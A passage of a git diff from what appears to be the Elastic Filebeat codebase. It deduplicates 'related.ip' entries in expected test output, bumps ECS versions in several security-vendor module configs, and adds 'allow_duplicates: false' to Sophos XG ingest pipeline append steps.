"192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, @@ -532,8 +528,7 @@ "related.ip": [ "192.168.15.196", "216.58.194.99", - "192.168.1.63", - "216.58.194.99" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 1613, @@ -642,8 +637,7 @@ "related.ip": [ "192.168.15.224", "209.234.224.22", - "192.168.1.63", - "209.234.224.22" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 21111, @@ -752,8 +746,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, @@ -862,8 +855,7 @@ "related.ip": [ "192.168.15.224", "172.217.2.238", - "192.168.1.63", - "172.217.2.238" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 3732, @@ -972,8 +964,7 @@ "related.ip": [ "192.168.15.207", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 221, @@ -1082,8 +1073,7 @@ "related.ip": [ "192.168.15.207", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 221, @@ -1192,8 +1182,7 @@ "related.ip": [ "192.168.15.207", "17.249.60.78", - "192.168.1.63", - "17.249.60.78" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 5469, @@ -1302,8 +1291,7 @@ "related.ip": [ "192.168.15.207", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 224, @@ -1412,8 +1400,7 @@ "related.ip": [ "192.168.15.207", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 117, @@ -1522,8 +1509,7 @@ "related.ip": [ "192.168.15.207", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 307, @@ -1632,8 +1618,7 @@ "related.ip": [ "192.168.15.207", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 365, @@ -1742,8 +1727,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, @@ -1852,8 +1836,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 161, @@ -1962,8 +1945,7 @@ "related.ip": [ "192.168.15.224", "98.138.49.44", - "192.168.1.63", - "98.138.49.44" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 7805, @@ -2072,8 +2054,7 @@ "related.ip": [ "192.168.15.224", "72.30.3.43", - "192.168.1.63", - "72.30.3.43" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 6106, @@ -2182,8 +2163,7 @@ "related.ip": [ "192.168.15.196", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 196, @@ -2292,8 +2272,7 @@ "related.ip": [ "192.168.15.224", "172.217.9.142", - "192.168.1.63", - "172.217.9.142" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 3245, @@ -2402,8 +2381,7 @@ "related.ip": [ "192.168.15.207", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 179, @@ -2515,8 +2493,7 @@ "related.ip": [ "192.168.15.224", "54.84.80.198", - "192.168.1.63", - "54.84.80.198" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 4537, @@ -2626,8 +2603,7 @@ "related.ip": [ "192.168.15.224", "199.167.55.52", - "192.168.1.63", - "199.167.55.52" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 0, @@ -2736,8 +2712,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, @@ -2842,8 +2817,7 @@ "related.ip": [ "192.168.15.210", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 130, @@ -2949,8 +2923,7 @@ "related.ip": [ "192.168.15.224", "172.217.9.142", - "192.168.1.63", - "172.217.9.142" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 1991, @@ -3059,8 +3032,7 @@ "related.ip": [ "192.168.15.224", "151.101.2.2", - "192.168.1.63", - "151.101.2.2" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 523, @@ -3172,8 +3144,7 @@ "related.ip": [ "192.168.15.224", "216.58.194.66", - "192.168.1.63", - "216.58.194.66" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 2428, @@ -3282,8 +3253,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, @@ -3392,8 +3362,7 @@ "related.ip": [ "192.168.15.210", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 196, @@ -3502,8 +3471,7 @@ "related.ip": [ "192.168.15.224", "184.51.253.193", - "192.168.1.63", - "184.51.253.193" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 5003, @@ -3612,8 +3580,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 171, @@ -3723,8 +3690,7 @@ "related.ip": [ "192.168.15.224", "199.167.55.52", - "192.168.1.63", - "199.167.55.52" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 0, @@ -3836,8 +3802,7 @@ "related.ip": [ "192.168.15.224", "199.167.52.219", - "192.168.1.63", - "199.167.52.219" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 2316, @@ -3949,8 +3914,7 @@ "related.ip": [ "192.168.15.224", "52.71.117.196", - "192.168.1.63", - "52.71.117.196" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 13966, @@ -4059,8 +4023,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 244, @@ -4169,8 +4132,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 205, @@ -4282,8 +4244,7 @@ "related.ip": [ "192.168.15.224", "35.186.194.41", - "192.168.1.63", - "35.186.194.41" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 2302, @@ -4390,8 +4351,7 @@ "related.ip": [ "192.168.15.224", "35.201.124.9", - "192.168.1.63", - "35.201.124.9" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 6757, @@ -4503,8 +4463,7 @@ "related.ip": [ "192.168.15.224", "100.24.131.237", - "192.168.1.63", - "100.24.131.237" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 9007, @@ -4613,8 +4572,7 @@ "related.ip": [ "192.168.15.224", "184.51.252.247", - "192.168.1.63", - "184.51.252.247" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 661, @@ -4726,8 +4684,7 @@ "related.ip": [ "192.168.15.224", "35.190.88.148", - "192.168.1.63", - "35.190.88.148" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 11136, @@ -4839,8 +4796,7 @@ "related.ip": [ "192.168.15.224", "35.186.243.83", - "192.168.1.63", - "35.186.243.83" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 11136, @@ -4949,8 +4905,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 182, @@ -5059,8 +5014,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 90, @@ -5172,8 +5126,7 @@ "related.ip": [ "192.168.15.224", "100.24.165.74", - "192.168.1.63", - "100.24.165.74" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 6669, @@ -5282,8 +5235,7 @@ "related.ip": [ "192.168.15.224", "184.51.252.247", - "192.168.1.63", - "184.51.252.247" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 661, @@ -5390,8 +5342,7 @@ "related.ip": [ "192.168.15.224", "35.201.94.140", - "192.168.1.63", - "35.201.94.140" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 11136, @@ -5496,8 +5447,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, @@ -5606,8 +5556,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 144, @@ -5716,8 +5665,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 206, @@ -5826,8 +5774,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 206, @@ -5936,8 +5883,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 169, @@ -6046,8 +5992,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 132, @@ -6156,8 +6101,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 127, @@ -6266,8 +6210,7 @@ "related.ip": [ "192.168.15.196", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 105, @@ -6376,8 +6319,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 172, @@ -6486,8 +6428,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 134, @@ -6596,8 +6537,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 179, @@ -6706,8 +6646,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 218, @@ -6816,8 +6755,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 172, @@ -6926,8 +6864,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 305, @@ -7039,8 +6976,7 @@ "related.ip": [ "192.168.15.224", "66.28.0.45", - "192.168.1.63", - "66.28.0.45" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 527, @@ -7149,8 +7085,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 153, @@ -7259,8 +7194,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 169, @@ -7369,8 +7303,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 128, @@ -7479,8 +7412,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 181, @@ -7589,8 +7521,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 121, @@ -7702,8 +7633,7 @@ "related.ip": [ "192.168.15.224", "23.52.174.25", - "192.168.1.63", - "23.52.174.25" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 1246, @@ -7812,8 +7742,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 315, @@ -7922,8 +7851,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 130, @@ -8035,8 +7963,7 @@ "related.ip": [ "192.168.15.224", "54.230.5.228", - "192.168.1.63", - "54.230.5.228" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 288, @@ -8145,8 +8072,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 149, @@ -8255,8 +8181,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 202, @@ -8365,8 +8290,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 195, @@ -8475,8 +8399,7 @@ "related.ip": [ "192.168.15.195", "208.83.246.20", - "192.168.1.63", - "208.83.246.20" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 90, @@ -8584,8 +8507,7 @@ "related.ip": [ "192.168.15.196", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 192, @@ -8693,8 +8615,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 208, @@ -8802,8 +8723,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 100, @@ -8913,8 +8833,7 @@ "related.ip": [ "192.168.15.224", "35.185.88.112", - "192.168.1.63", - "35.185.88.112" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 7237, @@ -9023,8 +8942,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 109, @@ -9133,8 +9051,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 116, @@ -9243,8 +9160,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 96, @@ -9356,8 +9272,7 @@ "related.ip": [ "192.168.15.224", "50.19.85.24", - "192.168.1.63", - "50.19.85.24" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 654, @@ -9469,8 +9384,7 @@ "related.ip": [ "192.168.15.224", "50.19.85.24", - "192.168.1.63", - "50.19.85.24" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 654, @@ -9582,8 +9496,7 @@ "related.ip": [ "192.168.15.224", "50.19.85.24", - "192.168.1.63", - "50.19.85.24" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 654, @@ -9692,8 +9605,7 @@ "related.ip": [ "192.168.15.224", "104.254.150.9", - "192.168.1.63", - "104.254.150.9" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 7820, @@ -9805,8 +9717,7 @@ "related.ip": [ "192.168.15.224", "50.19.85.24", - "192.168.1.63", - "50.19.85.24" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 654, @@ -9918,8 +9829,7 @@ "related.ip": [ "192.168.15.224", "52.0.218.108", - "192.168.1.63", - "52.0.218.108" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 214, @@ -10031,8 +9941,7 @@ "related.ip": [ "192.168.15.224", "52.6.117.19", - "192.168.1.63", - "52.6.117.19" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 214, @@ -10144,8 +10053,7 @@ "related.ip": [ "192.168.15.224", "34.238.96.22", - "192.168.1.63", - "34.238.96.22" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 214, @@ -10257,8 +10165,7 @@ "related.ip": [ "192.168.15.224", "130.211.47.17", - "192.168.1.63", - "130.211.47.17" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 280, @@ -10367,8 +10274,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 172, @@ -10477,8 +10383,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, @@ -10587,8 +10492,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 94, @@ -10697,8 +10601,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 170, @@ -10807,8 +10710,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 94, @@ -10917,8 +10819,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 94, @@ -11027,8 +10928,7 @@ "related.ip": [ "192.168.15.224", "8.8.8.8", - "192.168.1.63", - "8.8.8.8" + "192.168.1.63" ], "rule.name": "new_outbound_from_trust", "server.bytes": 166, diff --git a/x-pack/filebeat/module/proofpoint/emailsecurity/config/input.yml b/x-pack/filebeat/module/proofpoint/emailsecurity/config/input.yml index 0b23c8ce377b..33545d1ac548 100644 --- a/x-pack/filebeat/module/proofpoint/emailsecurity/config/input.yml +++ b/x-pack/filebeat/module/proofpoint/emailsecurity/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/rabbitmq/log/config/log.yml b/x-pack/filebeat/module/rabbitmq/log/config/log.yml index 8c1ba12a8264..730ea5c04f37 100644 --- a/x-pack/filebeat/module/rabbitmq/log/config/log.yml +++ b/x-pack/filebeat/module/rabbitmq/log/config/log.yml @@ -18,4 +18,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/radware/defensepro/config/input.yml b/x-pack/filebeat/module/radware/defensepro/config/input.yml index 76a4ff731651..a2b133a9dc45 100644 --- a/x-pack/filebeat/module/radware/defensepro/config/input.yml +++ b/x-pack/filebeat/module/radware/defensepro/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/snort/log/config/input.yml b/x-pack/filebeat/module/snort/log/config/input.yml index b7fe0e504afa..17aab4adc03f 100644 --- a/x-pack/filebeat/module/snort/log/config/input.yml +++ b/x-pack/filebeat/module/snort/log/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/snyk/audit/config/config.yml b/x-pack/filebeat/module/snyk/audit/config/config.yml index 3a41b5086903..73cd5423a028 100644 --- a/x-pack/filebeat/module/snyk/audit/config/config.yml +++ b/x-pack/filebeat/module/snyk/audit/config/config.yml @@ -73,4 +73,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/snyk/vulnerabilities/config/config.yml b/x-pack/filebeat/module/snyk/vulnerabilities/config/config.yml index 7ce5c570372d..ca371361192a 100644 --- a/x-pack/filebeat/module/snyk/vulnerabilities/config/config.yml +++ b/x-pack/filebeat/module/snyk/vulnerabilities/config/config.yml @@ -96,4 +96,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/sonicwall/firewall/config/input.yml b/x-pack/filebeat/module/sonicwall/firewall/config/input.yml index 26340d167fc1..6c6188a7022b 100644 --- a/x-pack/filebeat/module/sonicwall/firewall/config/input.yml +++ b/x-pack/filebeat/module/sonicwall/firewall/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/sophos/utm/config/input.yml b/x-pack/filebeat/module/sophos/utm/config/input.yml index 07c7fdcbb183..0d4e59f4f42b 100644 --- a/x-pack/filebeat/module/sophos/utm/config/input.yml +++ b/x-pack/filebeat/module/sophos/utm/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/sophos/xg/config/config.yml b/x-pack/filebeat/module/sophos/xg/config/config.yml index 5a35058a55b3..676d19f05d30 100644 --- a/x-pack/filebeat/module/sophos/xg/config/config.yml +++ b/x-pack/filebeat/module/sophos/xg/config/config.yml @@ -27,7 +27,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - add_fields: target: '_conf' fields: diff --git a/x-pack/filebeat/module/sophos/xg/ingest/antivirus.yml b/x-pack/filebeat/module/sophos/xg/ingest/antivirus.yml index bb2548bf941b..a5c0b7c32cdd 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/antivirus.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/antivirus.yml @@ -315,16 +315,18 @@ processors: - append: field: related.ip value: '{{source.ip}}' + allow_duplicates: false if: 'ctx?.source?.ip != null' - append: field: related.ip value: '{{destination.ip}}' + allow_duplicates: false if: 'ctx?.destination?.ip != null' - append: field: related.user value: "{{source.user.name}}" + allow_duplicates: false if: "ctx.source?.user?.name != null" - ############# ## Cleanup ## ############# diff --git a/x-pack/filebeat/module/sophos/xg/ingest/atp.yml b/x-pack/filebeat/module/sophos/xg/ingest/atp.yml index df6ed8b35cab..c659264d633e 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/atp.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/atp.yml @@ -206,14 +206,17 @@ processors: - append: field: related.ip value: '{{source.ip}}' + allow_duplicates: false if: 'ctx?.source?.ip != null' - append: field: related.ip value: '{{destination.ip}}' + allow_duplicates: false if: 'ctx?.destination?.ip != null' - append: field: related.user value: "{{source.user.name}}" + allow_duplicates: false if: "ctx.source?.user?.name != null" ############# diff --git a/x-pack/filebeat/module/sophos/xg/ingest/cfilter.yml b/x-pack/filebeat/module/sophos/xg/ingest/cfilter.yml index a9dedb4070fd..0b5f92c1e699 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/cfilter.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/cfilter.yml @@ -237,14 +237,17 @@ processors: - append: field: related.ip value: '{{source.ip}}' + allow_duplicates: false if: 'ctx?.source?.ip != null' - append: field: related.ip value: '{{destination.ip}}' + allow_duplicates: false if: 'ctx?.destination?.ip != null' - append: field: related.user value: "{{source.user.name}}" + allow_duplicates: false if: "ctx.source?.user?.name != null" ############# diff --git a/x-pack/filebeat/module/sophos/xg/ingest/event.yml b/x-pack/filebeat/module/sophos/xg/ingest/event.yml index 2565434a6f01..7d5c397587aa 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/event.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/event.yml @@ -151,6 +151,11 @@ processors: field: source.user.name value: '{{sophos.xg.name}}' if: "ctx.sophos?.xg?.name != null" +- set: + field: user.name + value: '{{source.user.name}}' + ignore_empty_value: true + if: 'ctx.sophos?.xg?.log_subtype == "Authentication"' - rename: field: sophos.xg.usergroupname target_field: source.user.group.name diff --git a/x-pack/filebeat/module/sophos/xg/ingest/firewall.yml b/x-pack/filebeat/module/sophos/xg/ingest/firewall.yml index a9ad2eb988c9..43ab892b8cca 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/firewall.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/firewall.yml @@ -401,22 +401,27 @@ processors: - append: field: related.ip value: '{{source.ip}}' + allow_duplicates: false if: 'ctx?.source?.ip != null' - append: field: related.ip value: '{{destination.ip}}' + allow_duplicates: false if: 'ctx?.destination?.ip != null' - append: field: related.ip value: '{{source.nat.ip}}' + allow_duplicates: false if: 'ctx?.source?.nat?.ip != null' - append: field: related.ip value: '{{destination.nat.ip}}' + allow_duplicates: false if: 'ctx?.destination?.nat?.ip != null' - append: field: related.user value: "{{source.user.name}}" + allow_duplicates: false if: "ctx.source?.user?.name != null" ############# diff --git a/x-pack/filebeat/module/sophos/xg/ingest/idp.yml b/x-pack/filebeat/module/sophos/xg/ingest/idp.yml index f10f964eb13a..efd049cb580c 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/idp.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/idp.yml @@ -203,16 +203,17 @@ processors: - append: if: 'ctx?.source?.ip != null' field: related.ip - value: - - '{{source.ip}}' + value: '{{source.ip}}' + allow_duplicates: false - append: if: 'ctx?.destination?.ip != null' field: related.ip - value: - - '{{destination.ip}}' + value: '{{destination.ip}}' + allow_duplicates: false - append: field: related.user value: "{{source.user.name}}" + allow_duplicates: false if: "ctx.source?.user?.name != null" ############# diff --git a/x-pack/filebeat/module/sophos/xg/ingest/pipeline.yml b/x-pack/filebeat/module/sophos/xg/ingest/pipeline.yml index 8102bb925148..ef8599270e09 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/pipeline.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/pipeline.yml @@ -198,6 +198,11 @@ processors: } } ctx["host"]["name"] = name; +- append: + field: related.hosts + value: '{{host.name}}' + allow_duplicates: false + if: 'ctx.host?.name != null' ############# ## Cleanup ## diff --git a/x-pack/filebeat/module/sophos/xg/ingest/sandstorm.yml b/x-pack/filebeat/module/sophos/xg/ingest/sandstorm.yml index dce06fd1776d..53f4a2f1884c 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/sandstorm.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/sandstorm.yml @@ -106,14 +106,17 @@ processors: - append: field: related.ip value: "{{source.ip}}" + allow_duplicates: false if: "ctx.source?.ip != null" - append: field: related.user value: "{{source.user.name}}" + allow_duplicates: false if: "ctx.source?.user?.name != null" - append: field: related.hash value: "{{file.hash.sha1}}" + allow_duplicates: false if: "ctx.file?.hash?.sha1 != null" - remove: field: diff --git a/x-pack/filebeat/module/sophos/xg/ingest/waf.yml b/x-pack/filebeat/module/sophos/xg/ingest/waf.yml index 3cbf13834675..8e58395a3bfc 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/waf.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/waf.yml @@ -250,14 +250,17 @@ processors: - append: field: related.ip value: '{{source.ip}}' + allow_duplicates: false if: 'ctx?.source?.ip != null' - append: field: related.ip value: '{{destination.ip}}' + allow_duplicates: false if: 'ctx?.destination?.ip != null' - append: field: related.user value: "{{source.user.name}}" + allow_duplicates: false if: "ctx.source?.user?.name != null" ############# diff --git a/x-pack/filebeat/module/sophos/xg/test/anti-spam.log-expected.json 